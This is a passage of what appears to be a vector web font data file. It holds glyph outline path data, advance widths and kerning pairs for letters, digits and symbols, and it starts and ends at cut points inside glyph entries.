6r-28,-22v135,-114,235,-230,320,-363v66,-103,193,-367,228,-532v30,-138,50,-283,50,-436","w":555},{"d":"1162,0r64,-194r-274,0r6,-47r486,-434r51,0r-141,422r141,0r-17,59r-144,0r-64,194r-108,0xm1246,-253r86,-260r-289,260r203,0xm350,65r84,-139v25,-41,52,-81,79,-120v47,-67,143,-217,290,-451r410,-650v16,-6,61,2,59,0r-487,792v-53,68,-100,156,-143,221r-232,349xm276,-621r178,-546v-63,36,-126,65,-189,87r-3,-43v126,-51,219,-109,280,-173r60,0r-221,675r-105,0","w":1515},{"d":"432,-39v-204,-123,-335,-452,-224,-751v27,-72,64,-147,108,-224v15,-26,63,-85,150,-168v44,-42,189,-124,321,-137v220,-21,346,22,479,186v111,137,149,385,78,602v-53,163,-158,294,-272,401v-147,138,-432,216,-640,91xm316,-510v3,216,61,361,204,454v23,8,98,48,166,42v175,-19,222,-61,306,-158v89,-103,160,-277,198,-411v80,-282,4,-592,-202,-676v-195,-79,-391,46,-482,167v-80,107,-192,394,-190,582xm685,-1627v-41,-36,-39,-103,21,-105v79,14,84,43,150,124v68,84,110,148,134,185r-18,0v-172,-116,-266,-185,-287,-204","w":1387},{"d":"437,-540v-56,0,-104,-53,-104,-110v0,-56,52,-110,108,-110v57,0,100,50,100,109v0,59,-47,111,-104,111","w":683},{"d":"551,-1219v10,-57,-34,-55,-97,-75r3,-28v81,-6,143,-9,185,-9r44,0v-3,44,-17,74,-31,111r-208,537r-153,393v-30,99,-74,139,-89,208r4,16v22,-2,50,-17,85,-45v50,-40,97,-90,138,-151v19,-4,27,-5,43,-3v-36,82,-135,176,-182,210v-59,42,-104,77,-184,82v-22,1,-36,-12,-36,-32v-10,-38,201,-496,262,-667v60,-167,110,-285,143,-356v33,-71,63,-133,73,-191","w":448,"k":{"p":-25}},{"d":"669,-1213v-97,5,-164,67,-199,154r-41,-18v32,-117,149,-212,286,-218v164,-7,260,131,189,269v-16,29,-40,56,-71,81v-13,11,-75,54,-186,129v121,27,197,88,197,217v0,87,-32,183,-97,285v-123,196,-388,354,-703,337r9,-42v289,-4,488,-158,593,-353v37,-68,55,-133,55,-192v0,-91,-55,-158,-140,-158v-69,0,-179,72,-210,104v-15,-14,-25,-26,-28,-37v126,-114,358,-198,428,-337v19,-38,31,-76,31,-117v1,-61,-49,-107,-113,-104","w":960},{"d":"24,-268v-4,-59,66,-89,104,-43v25,30,22,133,38,171v9,21,20,43,36,62r210,-589v-113,-161,-128,-340,-7,-479v55,-63,128,-96,216,-103r14,-39v16,0,28,-2,43,1r-13,40v37,6,78,18,123,36r30,-76r42,-1v-4,22,-22,64,-34,101v78,58,117,127,117,208v0,41,-24,77,-60,77v-65,0,-60,-79,-60,-153v0,-25,-6,-48,-19,-70r-184,513v47,77,127,163,123,292v-4,138,-80,252,-179,304v-40,21,-97,37,-173,44r-69,189r-43,-1v16,-55,45,-125,67,-191v-44,-7,-86,-18,-125,-34r-82,226r-41,-1r85,-246v-83,-50,-152,-134,-159,-238xm587,-646r184,-516v-33,-30,-74,-45,-121,-45r-154,433v7,19,37,61,91,128xm593,-1202v-97,20,-162,111,-162,234v0,55,13,103,39,142r134,-375v-4,-1,-8,-1,-11,-1xm361,-13r175,-490v-28,-41,-53,-65,-94,-121r-209,572v46,26,89,39,128,39xm405,-13v121,-2,226,-124,226,-256v0,-67,-21,-131,-64,-192","w":896},{"d":"263,30v-71,6,-126,-42,-126,-105v0,-105,43,-221,73,-314r192,-591v26,-98,76,-158,76,-247v0,-10,-6,-22,-17,-35v-20,-14,-56,-19,-95,-18r2,-28v69,-12,116,-7,237,-16r-294,943r145,-191v136,-153,129,-173,245,-234v27,-14,53,-17,74,-17v62,1,107,79,105,143v-7,216,-125,402,-254,527v-64,63,-233,173,-363,183xm236,-83v-4,70,81,91,135,50v79,-37,234,-222,274,-291v63,-106,140,-221,140,-357v0,-64,-74,-75,-127,-44v-91,54,-294,317,-330,373v-38,58,-88,198,-92,269","k":{"v":-25,"l":27,"b":27,".":78,",":102}},{"d":"751,-1107v127,0,192,36,279,96r126,-126r73,76r-125,125v59,86,96,151,96,279v0,125,-38,190,-96,275r125,125r-73,74r-126,-125v-84,59,-153,97,-279,97v-124,0,-193,-38,-276,-96r-126,124r-75,-74r126,-124v-60,-86,-96,-151,-96,-279v0,-127,37,-190,96,-277r-126,-124r74,-76r126,125v89,-60,149,-95,277,-95xm1093,-659v0,-184,-157,-341,-341,-341v-185,0,-342,156,-342,341v0,183,158,341,342,341v183,0,341,-158,341,-341","w":1387},{"d":"500,-1158v-7,-126,-98,-202,-226,-229r0,-35v197,18,371,185,376,384v2,84,-48,242,-46,318v4,111,108,199,228,209r0,41v-121,11,-223,97,-228,210v-2,76,48,234,46,318v-5,197,-180,366,-376,384r0,-35v129,-30,219,-101,226,-230v4,-78,-51,-240,-46,-321v9,-173,136,-292,296,-344v-157,-53,-286,-176,-296,-348v-5,-82,50,-243,46,-322","w":981},{"d":"636,-1250v-308,-1,-333,18,-459,194v-12,-2,-24,-3,-35,-4v5,-18,11,-35,18,-51v29,-72,55,-147,76,-225r41,1v21,63,142,44,222,44r190,-1v84,-7,173,-7,256,-5r104,3v82,-6,259,8,310,-42v11,3,24,3,38,3r-62,282v-15,-1,-28,-2,-39,-5v-5,-158,-46,-200,-209,-200v-88,0,-173,1,-238,20v-22,60,-26,124,-48,304v-15,119,-119,662,-161,869v7,36,40,29,93,34v8,3,126,-1,129,19r-5,32v-71,1,-120,-11,-175,-11v-111,0,-246,3,-406,9v4,-15,9,-28,16,-40v59,-8,146,-9,189,-34v7,-4,11,-13,16,-24v20,-49,34,-159,64,-326r92,-515v29,-166,45,-275,48,-326v-20,-3,-42,-5,-65,-5","w":1195,"k":{"\u00e5":78,"\u00d6":-25,"\u00c5":27,"\u00c4":27,"z":78,"y":51,"w":51,"u":51,"s":78,"r":51,"o":78,"m":51,"e":78,"c":78,"a":78,"T":-102,"Q":-25,"O":-25,"G":-49,"A":27,";":-51,":":-76,".":51,",":78}},{"d":"416,-816v54,0,99,48,99,103v0,37,-12,73,-45,97v-71,53,-164,-9,-164,-89v0,-59,51,-111,110,-111xm189,-242v71,0,112,97,110,175v-4,174,-152,327,-288,389r-11,-40v9,-8,21,-17,36,-27v105,-77,157,-145,157,-206v0,-56,-93,-86,-93,-155v0,-46,33,-136,89,-136","w":448},{"d":"1046,-964v97,1,153,53,172,138r33,-110r157,-22r-117,399v-58,216,-81,238,-93,380v-3,41,33,77,74,76v49,0,107,-25,176,-73v133,-92,254,-350,249,-579v-8,-375,-266,-616,-648,-616v-354,0,-613,208,-743,475v-75,154,-115,313,-115,478v0,478,310,799,783,799v401,0,674,-236,804,-553r58,0v-103,338,-443,620,-867,614v-520,-7,-872,-362,-872,-886v0,-386,203,-701,471,-850v150,-84,308,-128,475,-128v429,0,707,268,714,685v4,247,-133,528,-289,624v-85,53,-172,82,-263,82v-96,0,-152,-46,-153,-136v0,-38,6,-87,18,-148v-92,111,-168,185,-228,225v-60,40,-115,60,-166,60v-105,-2,-181,-110,-181,-232v0,-97,32,-206,95,-326v63,-120,146,-218,250,-293v77,-55,145,-83,206,-83xm1182,-773v3,-80,-51,-143,-124,-144v-51,0,-101,28,-154,80v-105,104,-239,354,-251,545v-5,73,51,141,115,141v118,0,181,-90,256,-179v90,-107,153,-305,158,-443","w":1877},{"d":"138,19v-31,3,-57,-20,-60,-46v-11,-107,270,-557,284,-605v15,-47,57,-66,23,-108v-52,14,-112,58,-179,132r-54,10v56,-92,206,-209,321,-217v32,-2,49,30,39,63v-42,160,-230,458,-316,645v-5,11,-11,44,8,44v22,0,46,-12,71,-35v66,-59,110,-109,133,-148v12,0,25,1,39,3v-58,99,-169,250,-309,262xm619,-1243v37,-21,97,-8,96,36v0,29,-27,62,-82,100r-232,164r-18,-1v0,-2,180,-256,180,-252v18,-21,37,-36,56,-47","w":469},{"d":"432,-39v-204,-123,-335,-452,-224,-751v27,-72,64,-147,108,-224v15,-26,63,-85,150,-168v44,-42,189,-124,321,-137v220,-21,346,22,479,186v111,137,149,385,78,602v-53,163,-158,294,-272,401v-147,138,-432,216,-640,91xm316,-510v3,216,61,361,204,454v23,8,98,48,166,42v175,-19,222,-61,306,-158v89,-103,160,-277,198,-411v80,-282,4,-592,-202,-676v-195,-79,-391,46,-482,167v-80,107,-192,394,-190,582","w":1387,"k":{"\u00c5":78,"\u00c4":78,"Y":154,"X":51,"W":78,"V":154,"A":78,".":78,",":78}},{"d":"158,28v-73,0,-108,-52,-104,-135v9,-185,86,-286,203,-417v96,-108,150,-164,270,-216v79,-34,127,-39,210,-13v9,-20,23,-46,41,-77v19,-3,21,-3,40,0v3,42,-2,48,-15,107v67,-49,119,-74,154,-74v54,0,99,63,96,128v-5,116,-74,189,-157,241v-50,31,-133,70,-249,119v-41,98,-61,170,-61,216v0,31,12,58,42,59v31,0,70,-16,120,-46v56,-33,127,-111,184,-179v11,5,19,11,25,16v-68,113,-208,264,-383,268v-56,2,-98,-39,-98,-91v0,-27,7,-63,21,-110v-92,86,-161,141,-207,166v-46,25,-90,38,-132,38xm993,-695v0,-70,-67,-86,-111,-36v-59,40,-193,294,-215,367v97,-24,220,-112,276,-193v32,-46,50,-91,50,-138xm160,-117v2,76,73,92,138,50v112,-73,172,-119,240,-257v88,-178,148,-303,177,-378v-39,-43,-83,-27,-136,0v-166,84,-301,270,-385,454v-24,53,-34,97,-34,131","w":1003},{"d":"106,-356v10,-26,31,-63,42,-89r187,-5r119,3v51,-4,45,-2,97,2v-13,41,-26,73,-39,94v-21,3,-42,6,-60,0v-56,5,-64,-2,-103,-2v-67,0,-119,2,-156,5v-20,-5,-49,-7,-87,-8","w":533},{"d":"198,-55v42,25,139,20,188,37v-1,11,-3,22,-8,34r-185,-13r-277,14v-8,0,-17,-1,-26,-4v-2,-10,-3,-21,-3,-33v64,-20,163,0,212,-39v129,-103,241,-236,359,-349r133,-131r631,-609v41,-47,74,-84,98,-109v7,-7,25,-25,52,-55v22,-3,33,-2,59,0r-33,532r-36,469r-9,245v5,9,20,15,43,18v59,6,103,14,132,25v2,15,1,20,-4,37v-161,-30,-347,-2,-503,3v-10,0,-22,-1,-36,-4r2,-28r200,-32v31,-35,19,-58,35,-178v12,-92,14,-163,15,-212v1,-24,1,-42,2,-53v-8,-1,-27,-1,-58,-1r-578,17v-27,17,-53,51,-86,73v-35,41,-139,127,-191,183r-75,81v-20,18,-41,33,-55,57v1,7,2,16,2,25xm655,-532v168,26,410,-2,587,-13v17,-124,21,-261,31,-393r15,-187v-183,139,-357,332,-530,487v-39,35,-63,63,-103,106","w":1557,"k":{"y":78,"p":-25,"Y":51,"W":51,"V":129,"U":53,"Q":-25,"G":-25}},{"d":"1147,-304r-56,300r-925,4v-28,0,-55,-1,-81,-2v-2,-19,10,-24,18,-34r442,-530r442,-558r68,-90v12,-15,24,-29,36,-42v-171,-10,-398,-20,-553,23v-94,26,-104,59,-159,152v-4,15,-11,32,-22,51v-15,-1,-31,-2,-49,-4v15,-112,37,-171,61,-265r923,-2v10,43,-33,77,-39,90r-403,495r-173,217r-378,454r384,-7v77,-7,238,-7,296,-64v60,-59,95,-131,128,-192","w":1237},{"d":"91,0v-65,0,-107,4,-158,8r1,-38r60,-15v104,-27,109,-14,156,-82r387,-560v68,-95,121,-174,159,-238v23,-39,49,-79,78,-120v53,-75,94,-139,121,-193v-33,-13,-125,-25,-199,-30r2,-37r1082,0r-32,217r-30,0v-9,-79,-16,-127,-22,-142v-5,-11,-12,-17,-21,-20v-118,-29,-515,-8,-531,7v-9,27,-16,64,-24,110r-79,430v27,1,46,1,57,1v230,-3,325,4,463,-36v19,-27,50,-84,92,-169v9,0,21,1,36,4v-41,145,-70,270,-89,375r-13,68r-36,-2v4,-84,21,-148,-19,-184v-15,-14,-72,-18,-166,-18v-112,0,-224,2,-336,7v-4,19,-8,42,-13,69v-23,133,-51,274,-83,422v-11,51,-17,84,-20,99v61,23,150,34,266,34v301,-2,421,-81,531,-280v13,2,27,5,42,10v-16,85,-67,243,-94,316r-536,-11r-502,11v-40,0,-76,-1,-107,-3r6,-30v136,-14,158,-14,240,-46v45,-143,87,-338,128,-585r-322,1r-80,117v-140,216,-219,335,-237,356v-34,41,-51,73,-51,97v0,47,111,36,169,51r0,34xm603,-695v77,4,206,1,293,-1r63,-317v23,-113,36,-189,41,-228r-1,-6r-36,-2","w":1813},{"d":"713,-1394v11,-13,50,-52,117,-115r270,-255r57,-1r20,373r-21,1r-76,-244r-336,240xm394,-1197v0,-54,-116,-41,-157,-58r15,-53v171,22,301,8,498,-3v3,22,4,24,2,44v-19,9,-195,16,-192,45v-50,140,-90,442,-118,623v-30,194,-43,227,-17,368v13,71,52,122,103,153v102,61,196,71,311,51v248,-44,326,-129,391,-363v20,-72,107,-604,107,-755v0,-95,-101,-121,-197,-127v-2,-14,0,-23,4,-42v153,14,300,12,461,4r1,39v-28,6,-129,26,-146,39v-49,37,-68,95,-79,181r-43,338v-42,235,-69,510,-233,637v-91,71,-254,118,-432,102v-242,-22,-412,-120,-412,-378v0,-220,38,-292,83,-544r47,-266v2,-14,3,-26,3,-35","w":1472},{"d":"685,-698v0,66,-76,80,-107,35v-13,-19,-28,-88,-65,-88v-23,0,-47,16,-75,43v-83,82,-229,402,-225,563v1,45,5,76,42,76v26,0,55,-14,86,-42v42,-37,85,-89,128,-156v20,-4,27,-5,44,-3v-57,103,-168,292,-310,292v-83,0,-104,-73,-104,-169v0,-221,162,-457,275,-571v45,-45,121,-98,204,-102v57,-3,107,62,107,122","w":555,"k":{"y":-51,"k":27,",":27}},{"d":"217,-678r492,0r0,-494r88,0r0,494r495,0r0,88r-495,0r0,489r-88,0r0,-489r-492,0r0,-88","w":1365},{"d":"120,-46v5,-56,67,-90,145,-90v28,0,45,-1,52,-4v20,-9,57,-37,112,-86r296,-267v29,-24,62,-59,101,-106v-150,12,-211,0,-335,-82v-46,-31,-88,-47,-126,-47v-94,0,-164,96,-113,184r13,1v22,-29,28,-78,77,-75v42,3,58,35,62,86v-11,40,-47,70,-96,70v-64,-1,-109,-62,-109,-133v0,-114,132,-224,255,-224v62,0,127,28,198,80v95,69,97,90,163,102v18,3,39,-14,43,-33v15,-79,15,-106,73,-113v30,-4,64,28,63,56v0,24,-6,45,-19,63v-40,56,-120,110,-193,187v-55,58,-125,109,-185,164v-66,60,-132,124,-205,185r113,62v99,94,116,325,190,463v26,49,76,88,148,86v60,-2,103,-7,88,-60v-6,-8,-63,-22,-67,-32v-33,-42,8,-98,57,-94v46,3,76,42,75,96v-2,88,-67,127,-171,127v-116,0,-149,-24,-205,-84v-75,-80,-84,-111,-126,-262v-38,-137,-45,-174,-104,-241v-41,-29,-60,-17,-101,24v-39,40,-74,60,-107,60v-31,0,-65,-31,-62,-63","w":853,"k":{"\u00f6":-25,"p":-100,"o":-25,"i":-76,"e":-25}},{"d":"671,-544v2,-103,-72,-184,-172,-182v-47,0,-103,21,-170,62r207,-611v114,-8,312,17,412,-1v25,-4,32,-45,74,-35v-18,53,-31,124,-56,167v-131,18,-279,-1,-418,0r-105,309v195,-67,366,68,366,255v0,99,-31,199,-101,296v-128,178,-347,304,-675,308v-2,-20,-4,-32,5,-45v130,-5,297,-53,394,-119v107,-73,235,-247,239,-404","w":960},{"d":"166,-678v0,-406,304,-709,709,-709v405,0,710,302,710,709v0,407,-302,709,-710,709v-407,0,-709,-302,-709,-709xm1523,-678v0,-371,-278,-648,-648,-648v-369,0,-647,277,-647,648v0,372,275,648,647,648v371,0,648,-276,648,-648xm1137,-1089v31,-2,36,-16,49,-45r40,0r20,280r-39,0v-42,-142,-137,-236,-303,-236v-221,0,-317,162,-321,389v-5,254,107,413,331,413v130,0,234,-54,312,-162r37,19v-93,135,-220,203,-383,203v-255,0,-463,-197,-463,-444v0,-260,225,-463,498,-463v92,0,131,29,222,46","w":1557},{"d":"590,-1204v0,-46,-59,-45,-92,-60r9,-26v85,0,162,-10,233,-31r37,0r-367,801v-3,7,-6,16,-8,25v76,-48,123,-112,189,-167v104,-87,158,-145,295,-145v70,0,163,50,158,135v-8,149,-181,255,-375,255v-47,0,-101,-4,-163,-13v32,112,72,168,140,276v35,55,114,118,163,143v80,41,194,2,201,-72v1,-13,-13,-30,-24,-30v-5,-3,-49,22,-71,21v-30,0,-62,-17,-61,-50v2,-41,39,-69,88,-64v73,8,107,55,107,123v0,75,-80,135,-168,131v-206,-9,-284,-91,-386,-239v-33,-49,-68,-130,-106,-245v-55,85,-198,416,-229,452v-21,25,-51,22,-89,10v-3,-7,-5,-14,-5,-19v0,-33,78,-172,114,-255r62,-141r213,-467r126,-295v6,-19,9,-36,9,-53xm967,-590v44,-51,52,-129,-32,-125v-210,9,-362,127,-472,230v131,34,274,7,381,-29v60,-20,99,-48,123,-76","w":1067,"k":{"\u00f6":51,"y":78,"o":51,"e":51}},{"d":"491,-27v-144,53,-179,52,-296,10v-25,41,-110,284,-162,425v-10,26,-20,48,1,58v37,17,111,5,143,24v3,10,9,18,0,27r-107,0v-83,-1,-185,1,-261,-1r-97,-2v-2,-11,0,-17,5,-31v47,-17,154,-9,191,-40v122,-258,207,-565,312,-842r75,-220v14,-41,27,-83,38,-124v-75,10,-143,35,-201,52v-5,0,-14,-2,-25,-7v-4,-16,0,-26,14,-35v33,-21,110,-44,232,-70v53,-125,49,-177,92,-253v24,-3,36,-2,67,0v31,37,11,35,0,89v-8,36,-48,128,-52,147v230,-25,378,82,378,291v0,188,-113,338,-226,431v-45,37,-86,58,-121,71xm234,-134v-27,111,108,120,191,83v23,-10,69,-34,124,-87v103,-99,172,-237,172,-395v0,-57,-11,-119,-43,-153v-54,-57,-130,-72,-238,-63v-44,137,-82,243,-109,320r-83,239v-7,19,-10,38,-14,56","k":{"z":27,"w":27,".":51,",":51}},{"d":"506,-1101v-38,0,-69,-28,-69,-63v0,-43,42,-79,89,-78v32,1,58,33,57,69v-1,44,-30,72,-77,72xm-432,451v-46,-54,39,-134,92,-83v25,16,31,79,58,90v120,-6,151,-50,206,-138v168,-271,267,-636,410,-930v17,-35,26,-66,26,-93v1,-12,-9,-23,-19,-23v-77,29,-116,81,-190,168v-9,-5,-18,-11,-26,-20v56,-80,161,-191,254,-233v29,-14,59,-21,90,-21v10,9,15,18,15,27v12,58,-98,306,-164,475v-52,134,-236,554,-283,626v-71,109,-181,205,-341,207v-71,1,-98,-18,-128,-52","w":427,"k":{"p":-25}},{"d":"1358,-1107v-5,-133,-4,-160,-123,-164v-223,-9,-334,32,-490,131v-38,24,-95,71,-170,142v-28,25,-135,161,-185,255v-70,130,-115,397,-17,530v92,125,215,200,429,201v142,0,222,-42,292,-115v11,-12,43,-59,96,-141r33,10r-76,234v-174,66,-502,79,-673,21v-120,-41,-246,-145,-295,-279v-47,-129,-44,-277,3,-389v134,-319,348,-469,666,-599v139,-57,278,-53,455,-54v43,0,88,7,135,20v-5,45,-38,185,-51,224r-29,-1r0,-26xm467,420v44,1,83,-48,83,-95v0,-39,-17,-69,-49,-94v-24,-20,-32,-14,-33,-44v23,-65,31,-70,84,-196r27,1v-9,35,-41,93,-50,128v2,23,9,23,29,46v29,33,44,74,44,124v0,98,-73,175,-170,173v-47,-1,-83,-11,-85,-53v-1,-19,12,-38,26,-40v27,5,68,58,94,50","w":1280},{"d":"521,-700v89,-40,157,-55,238,-24v14,-24,22,-56,37,-66v35,-3,49,-6,74,4v8,29,-11,56,-23,88r-66,179v-28,81,-51,145,-73,193v-36,79,-66,197,-101,263v0,4,4,9,11,16v76,-42,159,-133,192,-171v8,7,15,14,22,21v-36,50,-152,172,-213,201v-28,13,-53,21,-77,21v-52,0,-57,-38,-36,-88r62,-152v7,-18,20,-49,41,-94v-70,82,-146,173,-233,249v-30,26,-244,152,-287,35v-50,-134,64,-335,114,-404v89,-124,193,-215,318,-271xm193,-138v0,58,28,86,90,70v59,-16,47,-22,120,-72v144,-149,126,-118,217,-248v19,-27,91,-172,91,-233v0,-34,-24,-70,-72,-68v-87,4,-132,45,-182,89v-112,99,-264,290,-264,462","k":{"v":-25}},{"d":"18,-66v0,-63,69,-147,144,-119v-10,26,-27,72,-27,83v0,29,35,45,63,30v66,-35,279,-233,333,-291v-45,-103,-104,-189,-159,-283v-20,-35,-55,-67,-90,-34v-11,85,-19,134,-22,147v-89,-58,-46,-282,47,-282v26,0,51,15,80,39v39,32,147,214,221,343r193,-174v125,-105,156,-151,259,-196v46,-20,80,16,80,64v0,69,-31,134,-93,147v-9,0,-21,-2,-35,-6v34,-54,54,-62,28,-103v-55,-7,-60,9,-115,45v-108,70,-198,169,-292,257v84,159,135,249,152,270v13,16,25,24,38,24v23,0,55,-41,54,-51v0,-25,-6,-53,-2,-76v9,0,16,2,21,5v17,24,25,57,25,99v0,52,-37,153,-102,146v-70,-8,-80,-31,-126,-109r-139,-234r-84,81v-122,118,-211,191,-262,228v-77,56,-190,46,-190,-50","w":1024,"k":{"d":27,"c":27}},{"d":"380,-1360v48,-47,161,-34,155,44v-7,86,-28,99,-84,218r-138,295r-44,0r31,-296v16,-143,18,-200,80,-261","w":448},{"d":"-374,435v-4,-34,29,-59,57,-60v56,-3,69,104,136,104v28,0,63,-16,104,-48v144,-168,208,-469,276,-715r84,-304v18,-60,32,-102,41,-127r-177,2v2,-19,4,-35,6,-50r190,-8v68,-216,133,-424,319,-526v22,-12,50,-18,85,-18v72,0,139,48,142,106v2,51,-62,79,-99,42v-35,-21,-21,-105,-82,-100v-54,5,-67,29,-103,69v-69,75,-131,309,-158,426v51,5,99,-4,152,2v2,21,0,29,-5,51r-165,6r-151,524v-74,236,-136,480,-292,623v-60,55,-104,90,-211,91v-91,1,-142,-23,-149,-90","w":448,"k":{"k":27,"f":-51,"e":-25,"?":-205,".":-51,",":-25,"!":-102," ":-461}},{"d":"435,-794r5,-412v-1,-32,-16,-44,-47,-48v-85,-10,-135,-10,-150,-12v1,-14,-6,-35,4,-42r330,6r238,-1r-18,41v-91,15,-176,-3,-210,51v-9,15,-14,47,-15,94r-22,591v-8,160,-10,275,-12,346r-2,83v102,-86,191,-179,282,-271v190,-193,299,-312,337,-347v71,-64,187,-189,253,-269r60,-60r164,-180v2,-3,3,-8,3,-14v-34,-33,-116,-22,-183,-34r0,-33r198,9v16,-1,41,-2,74,-2v76,0,93,-10,172,-6r0,35v-57,2,-148,33,-172,52r-59,47r-234,233v-90,82,-240,250,-252,255v-23,21,-42,39,-57,55r-510,522r-159,144r-48,-1r17,-564","w":1643,"k":{"\u00e5":102,"\u00d6":-25,"\u00c5":256,"\u00c4":256,"y":51,"u":129,"r":102,"o":129,"e":129,"a":180,"O":-25,"G":-25,"A":256,";":27,".":102,",":102}},{"d":"685,-698v0,66,-76,80,-107,35v-13,-19,-28,-88,-65,-88v-23,0,-47,16,-75,43v-83,82,-229,402,-225,563v1,45,5,76,42,76v26,0,55,-14,86,-42v42,-37,85,-89,128,-156v20,-4,27,-5,44,-3v-57,103,-168,292,-310,292v-83,0,-104,-73,-104,-169v0,-221,162,-457,275,-571v45,-45,121,-98,204,-102v57,-3,107,62,107,122xm104,414v44,1,83,-48,83,-95v0,-39,-17,-69,-49,-94v-24,-20,-32,-14,-33,-44v23,-65,31,-70,84,-196r27,1v-9,35,-41,93,-50,128v2,23,9,23,29,46v29,33,44,74,44,124v0,98,-73,175,-170,173v-47,-1,-83,-11,-85,-53v-1,-19,12,-38,26,-40v27,5,68,58,94,50","w":555},{"d":"749,5v-150,0,-307,4,-460,1r7,-30r189,-30v38,-13,33,-32,50,-83v40,-122,105,-424,113,-478v-43,-74,-252,-513,-315,-616v-25,-42,-25,-20,-125,-39v-28,-5,-49,-4,-60,-6v-4,-12,-1,-34,-1,-41v59,-2,131,16,191,14r318,-10v5,19,7,21,3,39r-138,23v-20,7,-27,18,-18,36r49,98v92,176,114,279,221,441v130,-131,209,-207,235,-230v26,-23,53,-50,82,-80v54,-59,202,-168,202,-232v0,-15,-7,-26,-20,-34v-31,-21,-110,-27,-184,-27v-2,-14,-1,-19,4,-34r156,-1v101,9,206,0,309,-3r-2,40v-64,17,-129,30,-173,67v-45,39,-148,140,-185,175r-392,377r-99,425v-13,47,-19,90,-19,130v0,93,116,55,203,73v3,14,2,16,-2,31v-33,3,-79,4,-139,4xm1019,-1722v37,-21,97,-8,96,36v0,29,-27,62,-82,100r-232,164r-18,-1v0,-2,180,-256,180,-252v18,-21,37,-36,56,-47","w":1323},{"d":"772,-678v7,-26,8,-62,-21,-62v-11,0,-22,5,-37,13v-99,52,-290,305,-333,372v-70,111,-131,224,-183,339v-8,19,-18,32,-29,41v-33,5,-37,4,-72,-2v-9,-19,-2,-20,6,-49v11,-37,87,-211,131,-328r128,-339v-2,-9,-5,-13,-14,-14v-35,0,-89,55,-162,164v-17,2,-17,1,-36,0v62,-108,163,-250,300,-283v3,0,8,0,15,1v29,28,19,60,5,98r-140,377v5,-7,10,-13,14,-19v95,-140,257,-345,378,-427v61,-41,167,-49,167,35v0,56,-15,77,-35,141v-28,85,-175,396,-230,539v0,4,2,10,7,18v37,-8,93,-67,168,-178r41,1v-39,68,-139,203,-220,248v-37,21,-123,38,-123,-11v0,-35,17,-90,51,-164r145,-317r56,-133v13,-29,20,-50,23,-61","w":875},{"d":"168,8v-34,21,-90,28,-90,-22v0,-67,29,-100,64,-170r171,-337r70,-149v16,-32,27,-36,12,-62v-22,9,-51,38,-93,77v-34,31,-78,76,-107,105r-32,-7v36,-59,176,-201,250,-241v48,-26,118,-34,118,21v0,28,-21,55,-32,91v-20,66,-277,522,-285,608v17,-3,41,-17,70,-42v115,-97,167,-152,244,-234v157,-168,203,-225,317,-463v36,-3,65,-9,82,13v-14,42,-40,111,-79,206r-186,464v-11,24,-19,46,-22,66r7,1v63,-36,119,-116,161,-168r32,5v-32,61,-84,129,-162,198v-58,50,-73,69,-133,52v-12,-13,-18,-25,-18,-36v0,-33,14,-82,41,-146r149,-349r-79,90v-170,195,-270,309,-470,429","w":875},{"d":"561,-819v117,0,166,102,166,251v0,155,-47,292,-141,412v-94,120,-190,180,-291,180v-200,0,-210,-267,-142,-450v36,-97,78,-162,133,-230v60,-76,155,-163,275,-163xm651,-681v0,-49,-28,-91,-69,-91v-39,0,-79,25,-123,69v-107,106,-244,394,-252,590v-5,111,122,105,186,44v89,-85,258,-447,258,-612xm757,-1243v37,-21,97,-8,96,36v0,29,-27,62,-82,100r-232,164r-18,-1v0,-2,180,-256,180,-252v18,-21,37,-36,56,-47","w":725},{"d":"1324,-9r-193,5v-9,0,-21,-1,-35,-2v-7,-18,-5,-20,3,-39v86,-8,161,1,186,-49v76,-331,132,-737,185,-1095r-344,592v-22,47,-53,95,-77,137v-116,201,-195,350,-244,445v-11,21,-21,39,-30,54r-38,0v-5,-300,-68,-532,-120,-809r-70,-371r-184,533v-40,97,-102,356,-147,457v-48,109,103,106,189,121v16,2,12,29,7,43v-183,-5,-251,-19,-464,-11v-1,-17,2,-32,10,-40v118,-16,146,-25,192,-123v60,-128,141,-400,199,-558r168,-462v33,-87,-21,-105,-114,-102r-108,3r-10,-40v70,-6,103,-7,168,-4r200,8v31,59,38,181,57,260v23,90,60,354,72,423v17,96,31,167,40,214r37,203v89,-133,98,-166,200,-344r257,-447v54,-102,115,-207,182,-314v45,3,88,5,129,4r164,-4v5,1,11,1,19,2r-3,32v-59,24,-185,20,-195,83v-22,134,-48,297,-82,489r-92,528v-1,36,-14,75,-7,109v34,37,121,32,195,49v0,12,0,17,-5,29v-111,8,-180,-12,-297,-9","w":1685},{"d":"573,3v-168,-13,-345,5,-511,2v1,-13,1,-24,5,-30v71,-18,169,-15,209,-61v2,-4,11,-85,26,-242r36,-383v21,-171,32,-282,33,-333v1,-17,4,-38,9,-63v-2,-40,19,-90,-6,-116v-11,-11,-25,-18,-40,-23v-74,-5,-118,-9,-133,-12v-9,-17,-10,-19,-1,-36v75,-10,165,0,246,0v212,0,477,-51,597,68v96,96,110,264,10,376v-51,57,-129,117,-240,175v-2,2,212,333,313,494v52,84,81,121,183,137v19,3,42,7,71,13r-4,42r-270,-12r-145,2v-30,4,-66,0,-91,7v-9,-7,-13,-17,-14,-31v29,-37,142,0,189,-39v-28,-69,-131,-208,-182,-284r-191,-287v-67,13,-123,18,-201,13r-50,521v0,5,1,12,4,23v53,26,129,31,190,48v3,12,2,17,1,30v-20,1,-34,1,-43,1xm952,-953v64,-189,-52,-308,-263,-308v-58,0,-107,7,-146,20v-18,44,-19,99,-27,164r-19,163v-9,117,-15,190,-18,217r1,18v132,29,290,-21,364,-100v73,-78,78,-87,108,-174","w":1280,"k":{"\u00fc":-25,"\u00e5":-25,"\u00e4":-25,"\u00dc":102,"\u00d6":51,"y":27,"w":-25,"v":-25,"u":-25,"a":-25,"Y":129,"W":51,"V":129,"U":102,"T":78,"Q":27,"O":51,"G":27,"C":51}},{"d":"339,-1105v-2,-77,16,-152,-71,-152v-21,0,-37,-1,-50,-4r1,-38v128,-9,273,-3,400,4v2,10,1,16,-2,29v-77,21,-130,6,-133,99r-12,400r0,102r-7,115r-7,271r-9,141v51,-44,70,-83,112,-123v10,-9,24,-26,43,-50v30,-41,133,-148,199,-226r1,-39r32,-382v7,-63,10,-134,10,-214v0,-81,-69,-76,-132,-95r-1,-32r153,-4r63,2v68,-5,144,4,209,-1v4,0,9,2,16,5r0,26v-41,11,-138,25,-150,42v-16,12,-23,42,-23,90v0,20,-24,360,-23,434v23,-29,45,-54,65,-75v20,-21,85,-99,195,-232v14,-16,28,-39,48,-64v67,-82,104,-126,104,-138v-17,-40,-85,-39,-127,-57v-2,-12,-1,-19,2,-33v23,2,47,-2,71,-2r306,2v0,15,-2,28,-6,38v-155,17,-251,139,-324,228r-259,3